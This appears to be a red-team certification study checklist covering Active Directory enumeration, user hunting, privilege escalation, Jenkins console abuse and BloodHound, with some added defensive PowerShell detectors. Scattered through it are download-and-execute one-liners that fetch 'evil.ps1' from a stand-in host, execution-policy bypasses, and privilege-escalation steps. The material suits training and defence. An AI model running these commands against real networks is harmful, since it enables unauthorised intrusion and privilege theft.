CRTP Checklist

The document provides an extensive overview of Active Directory (AD) and PowerShell, detailing their functionalities, commands, and various attack and defense techniques associated with AD. It covers topics such as domain enumeration, privilege escalation, credential replay attacks, and the use of PowerShell scripts for managing AD environments. Additionally, it discusses security measures, group policy management, and the implications of trust relationships within AD structures.

Uploaded by

fpckrun

1 Introduction to Active Directory & Kerberos
2 Introduction to PowerShell
3 Domain Enumeration (Attacks & Defenses)
4 Trust & Privileges Mapping
5 Local Privilege Escalation
6 Credential Replay Attacks (Over-PTH, Token Replay, etc.)
7 Domain Privilege Escalation (Attacks & Defenses)
8 Dumping System & Domain Secrets
9 Kerberos Attacks & Defense (Golden, Silver Tickets & more)
10 Abusing Cross Forest Trusts (Attacks & Defense)
11 Delegation Issues
12 Persistence Techniques
13 Abusing SQL Server Trusts in an AD environment
14 Detecting attack techniques
15 Defending an AD environment
16 Bypassing Defenses
- Active Directory is a directory service used to manage Windows networks.
- It stores information about objects on the network and makes it easily available to users and admins.
- Active Directory enables centralized and secure management of an entire network, which might span a building, a city or multiple locations throughout the world.

Powershell Basics
- Powershell comes built-in with Windows.
- There is another version of Powershell called "Powershell Core" which works on .NET Core.

Powershell Help System
Load PowerView, then: Get-Help Get-NetUser (examples for topics: Get-Item)
  Powershell: Get-Help <topic>
Lists everything about the help topics
  Powershell: Get-Help *
Lists everything that contains the word "process"
  Powershell: Get-Help process
Updates the Help system (v3+)
  Powershell: Update-Help
Lists full help about a topic (Get-Item cmdlet in this case)
  Powershell: Get-Help Get-Item -Full
Lists examples of how to run a cmdlet (Get-Item cmdlet in this case)
  Powershell: Get-Help Get-Item -Examples

Powershell cmdlets
- cmdlets are used to perform an action, and a .NET object is returned as the output.
- cmdlets accept parameters for different operations.
- For example: the Get-Help cmdlet uses parameters like -Full, -Examples, etc.
- They have aliases, and cmdlets are not executables; you can write your own cmdlet with a few lines of script.

Lists all cmdlets in a powershell session
  Powershell: Get-Command -CommandType cmdlet
Lists the processes running on a system
  Powershell: Get-Process

Powershell Scripts
- Use cmdlets, native commands, functions, .NET, DLLs, Windows API and much more in a single 'program'.

Powershell Scripts : ISE
- It is a GUI editor/scripting environment.
- Tab completion, context-sensitive help, syntax highlighting, selective execution and in-line help are some of the useful features.

Powershell Scripts : Execution Policy
- It is NOT a security measure; it is present to prevent users from accidentally executing scripts.

Execution Policy bypass
Bypass ps execution policy
  command prompt: powershell -ExecutionPolicy bypass
  command prompt: powershell -c <command>
  command prompt: powershell -encodedcommand
  powershell: $env:PSExecutionPolicyPreference = "bypass"

PowerShell Modules
Imports a module
  powershell: Import-Module <module_path>
Lists all commands in a module
  powershell: Get-Command -Module <module_name>

PowerShell Script Execution (in-memory)
  PowerShell: iex (New-Object Net.WebClient).DownloadString('https://webserver/payload.ps1')
  PowerShell: $ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.230.1/evil.ps1');sleep 5;$response=$ie.Document.body.innerHTML;$ie.quit();iex $response
  powershell (v3 onwards): iex (iwr 'http://192.168.230.1/evil.ps1')
  powershell (v3 onwards): $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.230.1/evil.ps1',$false);$h.send();iex $h.responseText
  powershell (v3 onwards): $wr = [System.NET.WebRequest]::Create("http://192.168.230.1/evil.ps1"); $r = $wr.GetResponse(); IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()

How to interact with AD using PS?
1. [ADSI]
2. .NET Classes, e.g. System.DirectoryServices.ActiveDirectory
3. Native Executable
4. PowerShell Scripts (.NET classes & WMI)

Get Domain info using .NET classes  (Privileges: Domain User)
  Native Executable / .NET Classes: $ADClass = [System.DirectoryServices.ActiveDirectory.Domain]; $ADClass::GetCurrentDomain()
  Information obtained: Forest, DCs, Parent Domain, Current Domain, Child domains of the current domain

Check the current session's privileges  (Privileges: Domain User)
  PowerShell / Cmd prompt: whoami /priv

TOOLS
PowerView  (Privileges: Domain User)
  https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  Ways to load PowerView:
    1) . .\PowerView.ps1
    2) iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -UseBasicParsing)
AD Module  (Privileges: Domain User)
  https://github.com/samratashok/ADModule
  The AD Module helps to perform domain enumeration even in situations where your powershell session is running in constrained language mode.
  Ways to load the AD Module:
    a.) Import-Module .\Microsoft.ActiveDirectory.Management.dll
    b.) Import-Module .\ActiveDirectory\ActiveDirectory.psd1

Domain Enum
Gets the current domain  (Privileges: Domain User)
  PowerView: Get-NetDomain
  AD Module: Get-ADDomain
Get object of another domain  (Privileges: Domain User)
  PowerView: Get-NetDomain -Domain moneycorp.local
  AD Module: Get-ADDomain -Identity moneycorp.local
  Note: provided the current domain has a trust with the queried domain.
Get Domain SID for the current domain  (Privileges: Domain User)
  PowerView: Get-DomainSID
  AD Module: (Get-ADDomain).DomainSID
Get domain policy for the current domain  (Privileges: Domain User)
  PowerView: Get-DomainPolicy
  PowerView: (Get-DomainPolicy)."system access"
  PowerView: (Get-DomainPolicy)."Kerberos Policy"
  Information obtained: 1. Kerberos Policy (MaxTicketAge, MaxServiceAge, etc.)  2. System Access (MinimumPasswordAge, MaxPasswordAge, Password Complexity, etc.)  3. Registry values
Get domain policy for another domain  (Privileges: Domain User)
  PowerView: (Get-DomainPolicy -domain moneycorp.local)."system access"
  Note: provided the current domain has a trust with the queried domain.
Get DCs for the current domain  (Privileges: Domain User)
  PowerView: Get-NetDomainController
  AD Module: Get-ADDomainController
  Information obtained: 1. IP address  2. name  3. OS
Get DCs for another domain  (Privileges: Domain User)
  PowerView: Get-NetDomainController -Domain moneycorp.local
  AD Module: Get-ADDomainController -DomainName moneycorp.local -Discover
  Information obtained: 1. IP address  2. name  3. OS  4. LDAP / LDAPS port no.

Domain Users
Get a list of users in the current domain  (Privileges: Domain User)
  PowerView: Get-NetUser
  PowerView: Get-NetUser -Username student1
  AD Module: Get-ADUser -Filter * -Properties *
  AD Module: Get-ADUser -Identity student1 -Properties *
  Note the options: -Filter, -Properties, -Identity
Get list of all properties for users in the current domain  (Privileges: Domain User)
  PowerView: Get-UserProperty
  PowerView: Get-UserProperty -Properties pwdlastset
  AD Module: Get-ADUser -Filter * -Properties * | select -First 1 | Get-Member -MemberType *Property | select Name
  AD Module: Get-ADUser -Filter * -Properties * | select name,@{expression={[datetime]::fromFileTime($_.pwdlastset)}}
  Note the options: -Filter, -Properties, -Identity
  Note: properties like badpwdcount and pwdlastset help in identifying decoy objects / honeypots.
Search for a particular string in a user's attributes  (Privileges: Domain User)
  PowerView: Find-UserField -SearchField Description -SearchTerm "built"
  AD Module: Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | select name,description

Domain Computers
Get a list of computers in the current domain  (Privileges: Domain User)
  PowerView: 1. Get-NetComputer
             2. Get-NetComputer -OperatingSystem "*Server2016*"
             3. Get-NetComputer -Ping
             4. Get-NetComputer -FullData
  AD Module: 1. Get-ADComputer -Filter * | select Name
             2. Get-ADComputer -Filter 'OperatingSystem -like "*Server2016*"' -Properties OperatingSystem | select Name, OperatingSystem
             3. Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName}
             4. Get-ADComputer -Filter * -Properties *
  Note: the objects returned are not necessarily all computers/machines. Administrators simply have the ability to create a computer object in the domain, so all this does is fetch all the objects of type computer.
  Note: Get-NetComputer -Ping and Get-ADComputer -Filter * -Properties DNSHostName | %{Test-Connection -Count 1 -ComputerName $_.DNSHostName} are used to find out which machines are alive in the domain. Both use ICMP packets to test the connection, so if a host-based or external firewall drops ICMP packets or ping is filtered, there is a chance that the script returns false positives.

Domain Groups
Get all the domain groups in the current domain  (Privileges: Domain User)
  PowerView: 1. Get-NetGroup
             2. Get-NetGroup -Domain <target_domain>
             3. Get-NetGroup -FullData
  AD Module: 1. Get-ADGroup -Filter * | select Name
             2. Get-ADGroup -Filter * -Properties *
Get all the domain groups containing the word "admin" in the group name  (Privileges: Domain User)
  PowerView: Get-NetGroup -GroupName *admin*
  AD Module: Get-ADGroup -Filter 'Name -like "*admin*"' | select Name
  Note: groups like "Enterprise Admins", "Schema Admins" and "Enterprise Key Admins" are not visible in the result because these groups are only present in the root domain of the forest. Eg: Get-NetGroup -GroupName *admin* -Domain moneycorp.local (here, moneycorp.local is the forest root).
Get all the members of the Domain Admins group  (Privileges: Domain User)
  PowerView: Get-NetGroupMember -GroupName "Domain Admins" -Recurse
  AD Module: Get-ADGroupMember -Identity "Domain Admins" -Recursive
Get the group membership for a user  (Privileges: Domain User)
  PowerView: Get-NetGroup -Username "student1"
  AD Module: Get-ADPrincipalGroupMembership -Identity student1
List all the local groups on a machine  (Privileges: needs Administrator privs on a non-DC machine)
  PowerView: Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ListGroups
  Here, we are listing all the local groups on the Domain Controller machine (dcorp-dc).
  Note: without -ListGroups, we would be enumerating the group membership of the Administrators group on the Domain Controller.
Get members of all the local groups on a machine  (Privileges: needs Administrator privs on a non-DC machine)
  PowerView: Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Recurse
Get actively logged-on users on a computer  (Privileges: needs local admin rights on the target)
  PowerView: Get-NetLoggedon -ComputerName <servername>
Get locally logged-on users on a computer  (Privileges: needs remote registry on the target; started by default on server OS)
  PowerView: Get-LoggedonLocal -ComputerName dcorp-dc.dollarcorp.moneycorp.local
Get the last logged-on user on a computer  (Privileges: needs administrative rights and remote registry on the target)
  PowerView: Get-LastLoggedOn -ComputerName <servername>

Shares
Find shares on hosts in the current domain  (Privileges: Domain User)
  PowerView: Invoke-ShareFinder -Verbose
             (or) Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC -Verbose
  Note: Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC will avoid finding the default shares like IPC, etc.
Find sensitive files on computers in the domain  (Privileges: Domain User)
  PowerView: Invoke-FileFinder -Verbose
  Note: searches for files containing passwords, keys, etc.
Get all file servers of the domain  (Privileges: Domain User)
  PowerView: Get-NetFileServer
  Note: searches for high value targets (machines/servers where a lot of users authenticate to).

Group Policy (GPOs)
- Group Policy provides the ability to manage configuration and changes easily and centrally in AD.
- Allows configuration of security settings, registry-based policy settings, group policy preferences like startup, shutdown, log-on and logoff script settings, and software installations.
- GPOs can be abused for various attacks like privesc, backdoors, persistence, etc.

Get list of GPOs in the current domain  (Privileges: Domain User)
  PowerView: 1. Get-NetGPO
             2. Get-NetGPO | select displayname
             3. Get-NetGPO -ComputerName dcorp-student1.dollarcorp.moneycorp.local
Get the resultant set of group policy, i.e. the group policy applied on the current user session  (Privileges: Domain User)
  powershell: gpresult /R
Get GPO(s) which use Restricted Groups or groups.xml for interesting users  (Privileges: Domain User)
  PowerView: Get-NetGPOGroup
  Note: restricted groups are those groups that are pushed through group policy and are part of the local groups on your machine.
Get users which are in a local group of a machine using GPO  (Privileges: Domain User)
  PowerView: Find-GPOComputerAdmin -Computername dcorp-student1.dollarcorp.moneycorp.local
  Note: say we create a user and make it part of the "RDP users" group on all machines using group policy; then we can enumerate such users using Find-GPOComputerAdmin.
Get machines where the given user is a member of a specific group  (Privileges: Domain User)
  PowerView: Find-GPOLocation -UserName student1 -Verbose
  (Here, specific group means users being part of groups using a group policy.)
  Note: both of these commands (Find-GPOComputerAdmin and Find-GPOLocation) are only valid if there are groups that use group policies to push/create/delete/modify objects in a domain.
Get OUs in a domain  (Privileges: Domain User)
  PowerView: Get-NetOU -FullData
  Group Policy Module: Get-ADOrganizationalUnit -Filter * -Properties *
Get GPO applied on an OU. Read the GPO name from the gPLink attribute returned by Get-NetOU  (Privileges: Domain User)
  PowerView: Get-NetGPO -GPOname "{AB306569-220D-43FF-B03B-83E8F4EF8081}"
  Group Policy Module: Get-GPO -Guid AB306569-220D-43FF-B03B-83E8F4EF8081

Access Control Lists (ACLs)
Access Control Model
1. Enables control on the ability of a process to access objects and other resources in Active Directory based on:
   - Access Tokens (security context of a process: identity & privs of a user)
   - Security Descriptors (SID of the owner, Discretionary ACL (DACL) & System ACL (SACL))

Access Control List
1. List of Access Control Entries (ACE)
   - An ACE corresponds to an individual permission or audit access. (Who has permission, and what can be done on an object?)
2. Two types of ACLs:
   - DACL = defines the permissions trustees (a user or group) have on an object.
   - SACL = logs success and failure audit messages when an object is accessed.
3. ACLs are vital to the security architecture of an AD.

Get the ACLs (DACL) associated with the specified object  (Privileges: Domain User)
  PowerView: Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs
  An ACE record in this output means, for example, that the BUILTIN\Administrators group has 'CreateChild', 'Self', 'WriteProperty', 'ExtendedRight', 'Delete', 'GenericRead', 'WriteDacl' and 'WriteOwner' rights on the student1 object, of the type 'Allow'.
Get the ACLs associated with the specified prefix to be used for search  (Privileges: Domain User)
  PowerView: Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -Verbose
  AD Module: (Get-Acl 'AD:\CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access
Get the ACLs associated with the specified LDAP path to be used for search  (Privileges: Domain User)
  PowerView: Get-ObjectAcl -ADSpath "LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local" -ResolveGUIDs -Verbose
Search for interesting ACEs  (Privileges: Domain User)
  PowerView: Invoke-ACLScanner -ResolveGUIDs
  Note: interesting ACEs mean the ones where we have write or modify permissions instead of the default read rights.
Get the ACLs associated with the specified path  (Privileges: Domain User)
  PowerView: Get-PathAcl -Path "\\dcorp-dc.dollarcorp.moneycorp.local\sysvol"

Domain / Forest Trusts
Trusts
1. In an AD environment, a trust is a relationship between two domains or forests which allows users of one domain or forest to access resources in the other domain or forest.
2. Trusts can be automatic (parent-child, same forest, etc.) or established (forest, external).
3. Trusted domain objects (TDOs) represent the trust relationships in a domain.

Trust Directions
1. One-way trust: unidirectional --> users in the trusted domain can access resources in the trusting domain, but the reverse is not true.
2. Bi-directional trust

Trust Properties
1. Transitive trusts
2. Non-transitive trusts

Types of Trusts
1. Default / Automatic Trusts (eg: intra-forest trusts)
2. Shortcut Trusts (used to reduce access time in complex scenarios)
3. External Trusts (b/w two domains in different forests when the forests do not have a trust relationship)
4. Forest Trusts (b/w root domains of a forest)

Get a list of all domain trusts for the current domain  (Privileges: Domain User)
  PowerView: Get-NetDomainTrust
  PowerView: Get-NetDomainTrust -Domain us.dollarcorp.moneycorp.local
  AD Module: Get-ADTrust
  AD Module: Get-ADTrust -Identity us.dollarcorp.moneycorp.local
Get details about the current forest  (Privileges: Domain User)
  PowerView: Get-NetForest
  PowerView: Get-NetForest -Forest eurocorp.local
  AD Module: Get-ADForest
  AD Module: Get-ADForest -Identity eurocorp.local
Get all domains in the current forest  (Privileges: Domain User)
  PowerView: Get-NetForestDomain
  PowerView: Get-NetForestDomain -Forest eurocorp.local
  AD Module: (Get-ADForest).Domains
Get all global catalogs for the current forest (returns all machines that have a copy of the global catalog)  (Privileges: Domain User)
  PowerView: Get-NetForestCatalog
  PowerView: Get-NetForestCatalog -Forest eurocorp.local
  AD Module: Get-ADForest | select -ExpandProperty GlobalCatalogs
Map trusts of a forest  (Privileges: Domain User)
  PowerView: Get-NetForestTrust
  PowerView: Get-NetForestTrust -Forest eurocorp.local
  AD Module: Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

User Hunting
Find all machines in the current domain where the current user has local admin access  (Privileges: Domain User)
  PowerView: Find-LocalAdminAccess -Verbose
  Note: this function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then uses multi-threaded Invoke-CheckLocalAdminAccess on each of those machines. Since this function is extremely noisy and can cause a network spike, it is better to run it in chunks of machines (using the option -ComputerFile) rather than on all machines at once. The function leaves a 4624 (logon event) or 4634 (logoff event) on each machine in the domain.
  Note: the same check can also be done with the help of remote administration tools like WMI and PowerShell remoting. This is pretty useful in cases where the RPC and SMB ports (which are used by Find-LocalAdminAccess) are blocked. In such cases, you can use an alternate tool --> Find-WMILocalAdminAccess.ps1 (this works because WMI by default requires local admin access).
Find local admins on all machines of the domain  (Privileges: needs admin privs on non-DC machines)
  PowerView: Invoke-EnumerateLocalAdmin -Verbose
  Note: this function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then uses multi-threaded Get-NetLocalGroup on each machine.
Find computers where a specified user/group (Domain Admins, RDPUsers, etc.) has sessions (by default the Domain Admins group)  (Privileges: Domain User)
  PowerView: Invoke-UserHunter
  PowerView: Invoke-UserHunter -GroupName "RDPUsers"
  Note: this function queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using Get-NetGroupMember, gets a list of computers (Get-NetComputer) and lists sessions and logged-on users (Get-NetSession / Get-NetLoggedon) from each machine.
Find where our current user has local admin privs on servers that have domain admin sessions  (Privileges: Domain User)
  PowerView: Invoke-UserHunter -CheckAccess
Find computers (high value targets) where a domain admin is logged in  (Privileges: Domain User)
  PowerView: Invoke-UserHunter -Stealth
  Note: this function queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using Get-NetGroupMember, gets a list of only high value targets (high traffic servers: DCs, file servers & distributed file servers) for being stealthy and generating less traffic, and lists sessions and logged-on users (Get-NetSession / Get-NetLoggedon) from each machine.

Domain Enumeration Defenses
1. Most of the enumeration mixes really well with the normal traffic to the DC.
2. Hardening can be done on the DC (or other machines) to contain the information provided by the queried machine.

Defense against User Hunting
NetCease: a script that changes permissions on the NetSessionEnum method by removing the permission for the Authenticated Users group. This fails many of the attacker's session enumeration and hence user hunting capabilities.
  .\NetCease.ps1
  Restart-Service -Name Server -Force
  To revert back to the pre-NetCease state:
  .\NetCease.ps1 -Revert
  Restart-Service -Name Server -Force
SAMRi10: hardens Windows 10 and Server 2016 against enumeration which uses the SAMR protocol (like net.exe).
  https://kurtsh.com/2016/12/19/download-samri10-tool-for-hardening-sam-remote-access-in-windows-10server-2016/
  net.exe = net utility (net user /domain)
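The ACL section above says that "interesting" ACEs are the ones granting write or modify rights instead of the default read rights. The following is an added example, not part of the CRTP checklist or of PowerView: it takes ACE records in the shape Get-ObjectAcl returns (ObjectDN, IdentityReference, ActiveDirectoryRights, AccessControlType) and keeps only the Allow entries that grant a write-class right to a principal outside an expected baseline. The ACE records are constructed; the rights on the first one are the ones the checklist lists for BUILTIN\Administrators on student1, and the $ExpectedPrincipals baseline and the dcorp\RDPUsers / svc-example entry are assumptions for the example.

```powershell
# Added example (not from the CRTP checklist or PowerView): flag ACEs that grant
# write/modify rights to principals other than the ones expected to hold them.

# Rights that let a trustee change an object or its security, as opposed to read it.
$WriteRights = @('GenericAll', 'GenericWrite', 'WriteOwner', 'WriteDacl',
                 'WriteProperty', 'ExtendedRight', 'Self', 'CreateChild',
                 'DeleteChild', 'Delete', 'DeleteTree')

# Principals expected to hold write rights on user objects. This baseline is an
# assumption for the example; patterns are -like wildcards, tune them per environment.
$ExpectedPrincipals = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM',
                        'NT AUTHORITY\SELF', '*\Domain Admins', '*\Enterprise Admins')

function Find-InterestingAce {
    param(
        [Parameter(Mandatory)][object[]]$Aces,
        [string[]]$Rights   = $WriteRights,
        [string[]]$Expected = $ExpectedPrincipals
    )
    foreach ($ace in $Aces) {
        if ("$($ace.AccessControlType)" -ne 'Allow') { continue }
        # ActiveDirectoryRights is a flags enum; its string form is "A, B, C".
        $granted = "$($ace.ActiveDirectoryRights)" -split ',\s*'
        $write = @($granted | Where-Object { $Rights -contains $_ })
        if ($write.Count -eq 0) { continue }             # read-only ACE: not interesting
        $isExpected = $false
        foreach ($pattern in $Expected) {
            if ("$($ace.IdentityReference)" -like $pattern) { $isExpected = $true; break }
        }
        if ($isExpected) { continue }                    # expected holder of write rights
        [pscustomobject]@{
            ObjectDN    = $ace.ObjectDN
            Identity    = $ace.IdentityReference
            WriteRights = ($write -join ', ')
        }
    }
}

# Constructed sample in the shape of Get-ObjectAcl output.
$SampleAces = @(
    [pscustomobject]@{ ObjectDN = 'CN=student1,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
                       IdentityReference = 'BUILTIN\Administrators'
                       ActiveDirectoryRights = 'CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner'
                       AccessControlType = 'Allow' }
    [pscustomobject]@{ ObjectDN = 'CN=student1,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
                       IdentityReference = 'NT AUTHORITY\Authenticated Users'
                       ActiveDirectoryRights = 'GenericRead'
                       AccessControlType = 'Allow' }
    # Constructed delegation that should be reported: a non-admin group with GenericAll.
    [pscustomobject]@{ ObjectDN = 'CN=svc-example,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local'
                       IdentityReference = 'dcorp\RDPUsers'
                       ActiveDirectoryRights = 'GenericAll'
                       AccessControlType = 'Allow' }
)

# Offline run over the sample. Against a live domain, feed PowerView's output instead:
#   Find-InterestingAce -Aces (Get-ObjectAcl -SamAccountName student1 -ResolveGUIDs)
Find-InterestingAce -Aces $SampleAces | Format-Table -AutoSize
```

Only the third record is reported (dcorp\RDPUsers with GenericAll on svc-example); the BUILTIN\Administrators entry carries write rights but matches the baseline, and the Authenticated Users entry is read-only. Entries that do show up are the ones to review against the intended delegation model and remove or narrow.

The user hunting notes above say Find-LocalAdminAccess leaves a 4624 logon (and 4634 logoff) on every machine it touches, and the defenses section targets session enumeration rather than that footprint. As a second added example, not part of the checklist, the block below looks for that footprint on the log side: one account producing network logons (4624, logon type 3) on many distinct hosts inside a short window. The event records and the dcorp-srvN host names are constructed; the MinHosts and WindowMinutes thresholds are assumptions to tune.

```powershell
# Added example (not from the CRTP checklist): detect a local-admin sweep from
# Security log data, i.e. one account logging on over the network to many hosts
# within a short window. Input records and host names below are constructed.

function Find-LogonFanOut {
    param(
        # Objects with TimeCreated, Id, TargetUserName, Computer and LogonType fields.
        [Parameter(Mandatory)][object[]]$Events,
        [int]$MinHosts      = 5,     # distinct hosts that make a burst suspicious (assumed threshold)
        [int]$WindowMinutes = 10     # sliding window length (assumed threshold)
    )
    $netLogons = @($Events | Where-Object { $_.Id -eq 4624 -and $_.LogonType -eq 3 })
    foreach ($group in ($netLogons | Group-Object TargetUserName)) {
        $sorted = @($group.Group | Sort-Object TimeCreated)
        $best = $null
        # Slide a window over the account's logons and keep the widest host fan-out.
        for ($i = 0; $i -lt $sorted.Count; $i++) {
            $start = $sorted[$i].TimeCreated
            $end   = $start.AddMinutes($WindowMinutes)
            $hosts = @($sorted |
                Where-Object { $_.TimeCreated -ge $start -and $_.TimeCreated -le $end } |
                ForEach-Object { $_.Computer } |
                Sort-Object -Unique)
            if ($hosts.Count -ge $MinHosts -and ($null -eq $best -or $hosts.Count -gt $best.HostCount)) {
                $best = [pscustomobject]@{
                    Account     = $group.Name
                    WindowStart = $start
                    HostCount   = $hosts.Count
                    Hosts       = ($hosts -join ', ')
                }
            }
        }
        if ($null -ne $best) { $best }
    }
}

# Constructed sample: student1 reaches 12 hosts in two minutes (a sweep), while
# svcadmin touches two hosts an hour apart (routine administration).
$t0 = Get-Date '2024-01-15T09:00:00'
$SampleEvents = @()
foreach ($n in 1..12) {
    $SampleEvents += [pscustomobject]@{
        TimeCreated = $t0.AddSeconds(10 * $n); Id = 4624; TargetUserName = 'student1'
        Computer = "dcorp-srv$($n).dollarcorp.moneycorp.local"; LogonType = 3
    }
}
$SampleEvents += [pscustomobject]@{
    TimeCreated = $t0.AddMinutes(30); Id = 4624; TargetUserName = 'svcadmin'
    Computer = 'dcorp-adminsrv.dollarcorp.moneycorp.local'; LogonType = 3
}
$SampleEvents += [pscustomobject]@{
    TimeCreated = $t0.AddMinutes(90); Id = 4624; TargetUserName = 'svcadmin'
    Computer = 'dcorp-mgmt.dollarcorp.moneycorp.local'; LogonType = 3
}

# Offline run. On a collector, build $Events from the forwarded Security logs, e.g. with
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624} and the TargetUserName /
# LogonType values taken from each event's EventData.
Find-LogonFanOut -Events $SampleEvents -MinHosts 5 -WindowMinutes 10 | Format-List
```

On the sample this reports student1 with HostCount 12 and nothing for svcadmin. The check only works on centrally collected logs, since each 4624 is written on the machine that was reached, not on the DC; that is also why the checklist's advice to run Find-LocalAdminAccess in chunks lowers the fan-out per window, and why the threshold should be set from the environment's normal administrative pattern.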
In an AD environment, there are multiple scenarios which lead to privilege escalation. We had a look at the following:
- Hunting for local admin access on other machines
- Hunting for high privilege domain accounts (like a Domain Admin) - check for sessions from DAs

There are various ways of locally escalating privileges on a Windows box:
- Missing patches
- Automated deployment & Autologon passwords in clear text
  1. C:\Windows\Panther\unattend.xml --> usually contains passwords of at least local admins in clear text.
  2. C:\Windows\System32\Sysprep\Sysprep.xml --> usually contains creds in clear text.
  3. Autologon passwords are stored in the Windows Registry in clear text, which can also be extracted.
- AlwaysInstallElevated (any user can run MSI as SYSTEM)
- Misconfigured services (like unquoted service path, etc.)
- DLL hijacking & more

We can use the below tools for complete coverage:
- PowerUp --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- BeRoot --> https://github.com/AlessandroZ/BeRoot
- Privesc --> https://github.com/enjoiz/Privesc

Service issues using PowerUp
Get services with unquoted paths and a space in their name
  PowerUp: Get-ServiceUnquoted -Verbose  (load PowerUp first with . .\PowerUp.ps1)
Get services where the current user can write to its binary path or change arguments to the binary
  PowerUp: Get-ModifiableServiceFile -Verbose
Get the services whose configuration the current user can modify (such as making the service temporarily point to another binary, etc.)
  PowerUp: Get-ModifiableService -Verbose
Get list of all the services on this machine and their info
  PowerShell: Get-WmiObject -Class win32_service
Get list of the bin paths of all the services on this machine
  PowerShell: Get-WmiObject -Class win32_service | select pathname

Run all PrivEsc checks using tools
  PowerUp: Invoke-AllChecks
  BeRoot: .\beRoot.exe  (BeRoot is an executable)
  Privesc: Invoke-PrivEsc

Unquoted Service Path Vuln info.
What is unquoted service path vulnerability?
1. If we want to abuse/exploit the Unquoted Service Path vuln, then the privileges with which the service runs should be some higher privilege than what we have currently. (This can be seen in the "StartName" attribute, as seen in the image below.)
2. If we want to abuse/exploit the Unquoted Service Path vuln, then we must have the capability to restart the service (which can be found out from the "CanRestart" attribute in the above image).

Jenkins Feature Abuse
- What we have been doing up to now (and will keep doing further ahead as well) is relying on feature abuse.
- Feature abuse is awesome as there are seldom patches for it and it isn't the focus of security teams.
- One of the best feature abuses is targeting enterprise applications which are not built keeping security in mind.
- On Windows, many enterprise applications need either Administrative privileges or SYSTEM privileges, making them a great avenue for privilege escalation.
- Enterprise applications such as CI tools are very useful for feature abuse as they provide the ability to run OS level commands from the web console.
- One such CI tool is Jenkins.
- Jenkins is a widely used CI tool.
- There are many interesting aspects with Jenkins, but for now we would limit our discussion to the ability of running system commands on Jenkins.
- There is a Jenkins server running on dcorp-ci (172.16.3.11) on port 8080.
- On Windows, the Jenkins master or Jenkins slave at least needs local admin privs. By default it is SYSTEM, but at least local admin privs are required.

- On versions prior to Jenkins 2.x, anonymous read privileges are present.
- The anonymous read privs allow us to see the list of the users on the Jenkins instance and information about the build executor server.
- Jenkins does not have any protection against brute-force attacks. So, we can always try brute-force attacks without any fear of lockouts, etc. (This is only true in the case where Jenkins uses its own user database.) We can usually find out if it uses its own database by looking at the usernames.
- Jenkins also provides integration with AD or GSuite, etc. for authentication. In such cases, beware of running a brute-force attack.
- While trying to brute-force Jenkins, it is always a good bet to try the reverse of the username as the password.

What can an admin account (admin user) on Jenkins do?
- Jenkins provides a script console (https://172.16.3.11:8080/script) to the administrators. In the script console, Groovy scripts can be executed.
  Example script (for eg: whoami):
    def sout = new StringBuffer(), serr = new StringBuffer()
    def proc = 'whoami'.execute()
    proc.consumeProcessOutput(sout, serr)
    proc.waitForOrKill(1000)
    println "out> $sout err> $serr"
- If you want to check whether the user whose Jenkins instance you are logged into is a local admin on that machine, in the build step we can give something like the 'powershell net localgroup administrators' command and see if we belong to that set of users/groups.

What can you do if you have a normal user account on Jenkins?
- See for all projects if we have the 'configure' option. This is because:
- If you don't have admin access but could add/edit build steps in the build configuration, then we can add a build step, add "Execute Windows Batch command" and enter powershell -c <cmd>
- This way it is possible to download and execute scripts, run encoded scripts and more.
- In cases where there are already multiple builds for a project, if you have the permission to, then shuffle your build to be the top-most one, as Jenkins does not run the builds after the build that fails.

BloodHound
https://github.com/BloodHoundAD/BloodHound
- Provides a GUI for AD entities and relationships for the data collected by its ingestors.
- Uses graph theory to provide the capability of mapping the shortest path to interesting things like Domain Admins.
- There are built-in queries for frequently used actions.
- Also supports custom Cypher queries.
- More useful for the Blue Team and system admins than Red teamers because it causes a lot of noise in the network, causing a significant spike, and gets you detected easily.

Ingestors
- They ingest the data and supply it to BloodHound (SharpHound.ps1 is an ingestor).
- Invoke-BloodHound -CollectionMethod All -Verbose
- The generated archive can be uploaded to the BloodHound application.
- To avoid detections like Advanced Threat Analytics (ATA): Invoke-BloodHound -CollectionMethod All -ExcludeDC
- Before starting BloodHound, we need to start the Neo4j service:
  1. C:\neo4j-community-3.5.1\bin > neo4j.bat install-service
  2. C:\neo4j-community-3.5.1\bin > neo4j.bat start

Commands
Collect all domain data
  Invoke-BloodHound -CollectionMethod All -Verbose
Collect the session details of the domain users as well
  Invoke-BloodHound -CollectionMethod LoggedOn -Verbose
Turns on/off the node labels
  Ctrl key
Shows the members of the group (e.g. Domain Admins)
  Right click on a group node > Click 'Expand'

